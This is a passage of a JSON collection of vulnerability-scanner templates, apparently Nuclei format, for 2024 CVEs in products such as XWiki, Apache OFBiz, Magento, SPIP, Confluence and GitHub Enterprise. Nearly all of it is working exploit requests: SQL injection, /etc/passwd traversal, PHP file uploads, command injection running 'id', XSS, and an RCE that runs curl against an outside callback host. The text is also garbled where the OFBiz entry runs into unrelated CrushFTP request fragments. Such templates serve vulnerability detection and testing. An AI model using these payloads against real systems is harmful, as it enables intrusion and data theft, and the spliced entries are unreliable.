{{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparent=xwiki%3AMain.UserDirectory®ister_first_name={{firstname}}®ister_last_name={{lastname}}&xwikiname={{user}}®ister_password={{pass}}®ister2_password={{pass}}®ister_email=\"{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}}\n"],"payloads":{"path":[null,"/xwiki"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration successful","Attack succeeded","Failed to execute the [groovy]"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["data\\-xwiki\\-form\\-token=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2024-0204","info":{"name":"Fortra GoAnywhere MFT - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Create an administrator account","goanywhere"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-45195","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noutpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard\n","GET /common/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["/etc/passwd&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["root:x:"]},{"type":"word","part":"header","words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_1","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"login","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 111\nOrigin: {{RootURL}}\nReferer: http://{{RootURL}}/WebInterface/login.html\n\ncommand=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","internal":true,"words":["success"]},{"type":"word","part":"header_2","internal":true,"words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_2","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"auth-exploit","raw":["POST /WebInterface/function/?command=zip&c2f={{auth}}&path=/etc/passwd&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["root:x:"]}]}]},{"id":"CVE-2024-36683","info":{"name":"PrestaShop productsalert - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_any(tolower(body), \"productsalert\", \"prestashop\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 30s\nPOST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158\n","@timeout: 30s\nPOST /module/productsalert/AjaxProcess HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158\n"],"stop-at-first-match":true,"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=5","duration_2>=5"]}]}]},{"id":"CVE-2024-6095","info":{"name":"LocalAI - Partial Local File Read","severity":"medium"},"requests":[{"raw":["POST /models/apply HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"url\":\"file:///etc/passwd\"}\n"],"extractors":[{"type":"json","part":"body","name":"uuid","internal":true,"json":[".uuid"]}]},{"raw":["GET /models/jobs/{{uuid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[": cannot unmarshal !!str `root:x:...`"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6924","info":{"name":"TrueBooker <= 1.0.2 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/truebooker-appointment-booking\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntba_service_id=(SLEEP(6))\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-34102","info":{"name":"Adobe Commerce & Magento - CosmicSting","severity":"critical"},"requests":[{"raw":["POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://{{interactsh-url}}/xxe.xml\",\"dataIsURL\":true,\"options\":12345678}}}}}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(content_type, \"application/json\")","contains_any(body, \"log file\", \"cartId\", \"no Route\")","contains(body, \"message\")"],"condition":"and"}]}]},{"id":"CVE-2024-41810","info":{"name":"Twisted - Open Redirect & XSS","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"word","part":"response","words":["TWISTED_SESSION","[\"Twisted"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}?url=ws://example.com/\">"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["Location: ws://example.com/\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-27497","info":{"name":"Linksys E2000 1.0.06 position.js Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/position.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var session_key","close_session","HELPPATH"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27292","info":{"name":"Docassemble - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/interview?i=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[501]}]}]},{"id":"CVE-2024-24919","info":{"name":"Check Point Quantum Gateway - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /clients/MyCRL HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*","nobody:.*"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2340","info":{"name":"Avada < 7.11.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/fusion-forms/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Index of [\\s\\S]*title>","fusion"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32640","info":{"name":"Mura/Masa CMS - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nobject=displayregion&contenthistid=x\\'&previewid=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(header, \"application/json\")","contains_all(body, \"Unhandled Exception\")","contains_all(header,\"cfid\",\"cftoken\")"],"condition":"and"}]}]},{"id":"CVE-2024-33605","info":{"name":"Sharp Multifunction Printers - Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/installed_emanual_list.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ServiceEmanualList","/installed_emanual_down.html"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24131","info":{"name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","SuperWebMailerAPI"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0352","info":{"name":"Likeshop < 2.5.7.20210311 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/file/formimage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"file\";filename=\"{{filename}}.php\"\nContent-Type: application/x-php\n\n{{randstr}}\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"\\\"name\\\":\\\"{{filename}}.php\\\"\")","contains_all(body, \"code\\\":1\", \"base_url\\\":\\\"uploads\\\\/user\")"],"condition":"and"}],"extractors":[{"type":"json","part":"body","json":[".data.url"]}]}]},{"id":"CVE-2024-7008","info":{"name":"Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)","severity":"medium"},"requests":[{"raw":["GET /browse/book/TEST";window.stop();alert(document.domain);%2f%2f HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["window.location.href = \"/#book_id=TEST\";window.stop();alert(document.domain);//&panel=book_details"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1061","info":{"name":"WordPress HTML5 Video Player - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(header, \"application/json\")","contains_all(body, \"created_at\", \"video_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-5230","info":{"name":"FleetCart 4.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en/products?query=123"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, \"razorpayKeyId:\", \"loggedIn:\", \"storeName:\")","status_code == 200"],"condition":"and"},{"type":"word","words":["razorpayKeyId: ''"],"negative":true}]}]},{"id":"CVE-2024-33288","info":{"name":"Prison Management System - SQL Injection Authentication Bypass","severity":"high"},"requests":[{"raw":["POST /Admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=\n","GET /Admin/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<p>Change Password</p>","<p>Logout</p>","Admin Dashboard | Prison Management system"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5488","info":{"name":"SEOPress < 7.9 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["Sorry, you are not allowed to do that."],"internal":true}]},{"raw":["PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username+':aaaaaa')}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{marker}}&description={{marker}}\n"],"matchers":[{"type":"word","part":"body","words":["\"code\":\"success\""],"internal":true}]},{"raw":["GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["\"title\":\"{{marker}}\",\"description\":\"{{marker}}\""]}]}]},{"id":"CVE-2024-29269","info":{"name":"Telesquare TLR-2005KSH - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>","</xml>","Ethernet","inet"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-22927","info":{"name":"eyoucms v.1.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=\"num\" value=\"1\"><ScRiPt >alert(document.domain)</ScRiPt>","id=\"eytime\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-8517","info":{"name":"SPIP BigUp Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["formulaire_action_args","spip"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"formulaire","regex":["name=['\"]formulaire_action_args['\"]\\s*type=['\"]hidden['\"]\\s*value=['\"]([^'\"]+)['\"]"],"internal":true}]},{"raw":["POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"page\"\n\nspip_pass\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"lang\"\n\nfr\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action\"\n\noubli\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_args\"\n\n{{formulaire}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_sign\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"oubli\"\n\n{{email}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"nobot\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"bigup_retrouver_fichiers\"\n\na\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"RCE['.system('id').die().']\"; filename=\"{{filename}}.txt\"\nContent-Type: text/plain\n\n{{string}}\n--5f02b65945d644d6a32847ab130e9586--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-34061","info":{"name":"Changedetection.io <=v0.45.21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","is not a valid AppRise URL"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" value=\"([^\"]+)\""],"internal":true}]}]},{"id":"CVE-2024-31621","info":{"name":"Flowise 1.6.5 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/API/V1/credentials"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"credentialName\":","\"updatedDate\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0939","info":{"name":"Smart S210 Management Platform - Arbitary File Upload","severity":"critical"},"requests":[{"raw":["POST /Tool/uploadfile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywnsogfin\nAccept-Encoding: gzip, deflate, br\n\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"contents.php\"\nContent-Type: application/octet-stream\n\n<?php print({{num1}}*{{num2}}); ?>\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/{{filename}}.php\n------WebKitFormBoundarywnsogfin--\n","GET /home/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32651","info":{"name":"Change Detection - Server Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/"],"redirects":true,"max-redirects":2,"extractors":[{"type":"xpath","name":"version","internal":true,"xpath":["//*[@id=\"right-sticky\"]"]}],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","part":"body","words":["Change Detection"],"condition":"and"},{"type":"dsl","dsl":["compare_versions(version, '<= 0.45.20')"]}]}]},{"id":"CVE-2024-0305","info":{"name":"Ncast busiFacade - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /classes/common/busiFacade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"name\":\"ping\",\"serviceName\":\"SysManager\",\"userTransaction\":false,\"param\":[\"ping 127.0.0.1 | id\"]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","#str"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4434","info":{"name":"LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2 >= 6","status_code_2 == 200","contains(content_type,\"application/json\")","contains_all(body_2,\"No courses were found\",\"success\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"is_course_archive\""],"internal":true}]}]},{"id":"CVE-2024-3850","info":{"name":"Uniview NVR301-04S2-P4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="],"condition":"and"},{"type":"word","part":"header","words":["NVRDVR"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24763","info":{"name":"JumpServer < 3.10.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /{{paths}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"payloads":{"paths":["core/auth/login/?next=//oast.me","auth/login/?next=//oast.me","login/?next=//oast.me"]},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2024-0200","info":{"name":"Github Enterprise Authenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v3/user/orgs"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"extractors":[{"type":"json","part":"body","name":"org_name","internal":true,"json":[".[].login"]}]},{"method":"GET","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"matchers-condition":"and","matchers":[{"type":"word","words":["\"role\": \"admin\""],"part":"body"}]},{"method":"POST","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"],"headers":{"Content-Type":"application/json","Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"body":"{\n \"name\": \"{{randstr}}\"\n}\n","matchers":[{"type":"status","status":[201]}]},{"method":"GET","cookie-reuse":true,"path":["{{BaseURL}}/login"],"extractors":[{"type":"regex","part":"body","internal":true,"group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""],"name":"csrf_token"}]},{"method":"POST","path":["{{BaseURL}}/session"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&\n","matchers":[{"type":"status","status":[302]},{"type":"word","words":["_gh_render"],"part":"header"}]},{"method":"GET","path":["{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"],"extractors":[{"type":"regex","group":1,"name":"ghe_secret","internal":true,"regex":[""ENTERPRISE_SESSION_SECRET"=>"([^\"]+?)""],"part":"body"}],"matchers":[{"type":"word","words":["ENTERPRISE_SESSION_SECRET"],"part":"body"}]},{"method":"GET","path":["{{BaseURL}}/"],"headers":{"Cookie":"_gh_render={{final_payoad}}"},"matchers-condition":"and","matchers":[{"type":"status","status":[500]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-6159","info":{"name":"Push Notification for Post and BuddyPress <= 1.93 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/push-notification-for-post-and-buddypress\")"],"internal":true}]},{"raw":["@timeout 50s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=icpushcallback&onesignal_externalid=1+AND+SLEEP(6)&pushtype=onesignal_subscribed_users\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-30269","info":{"name":"DataEase <= 2.4.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/de2api/engine/getEngine;.js"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"username\", \"password\", \"port\", \"name\\\":\", \"pid\\\":\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5936","info":{"name":"PrivateGPT < 0.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/file=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-8877","info":{"name":"Riello Netman 204 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"START APPLICATION\", \"category\\\":\", \"codeStr\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5315","info":{"name":"Dolibarr ERP CMS `list.php` - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /htdocs/index.php?mainmenu=home HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginfunction=loginfunction&username={{username}}&password={{password}}\n","GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header_1","words":["Set-Cookie: DOLSESSID_"]},{"type":"word","part":"body_1","words":["SuperAdmin"]}]}]},{"id":"CVE-2024-8522","info":{"name":"LearnPress \u2013 WordPress LMS - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/learnpress\")"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 30s\nGET /wp-json/learnpress/v1/courses?course_filter=&c_fields=post_title,(select(sleep(6))),ID& HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=6","duration_2>=6"]}]}]},{"id":"CVE-2024-21683","info":{"name":"Atlassian Confluence Data Center and Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log+in&os_destination=\n","POST /doauthenticate.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\npassword={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action\n","POST /admin/plugins/newcode/addlanguage.action HTTP/1.1\nHost: {{Hostname}}\nX-Atlassian-Token: no-check\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE\n\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"languageFile\";filename=\"{{randstr}}.js\"\nContent-type: text/javascript\n\nnew java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"curl\",\"{{interactsh-url}}\"]).start()\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; 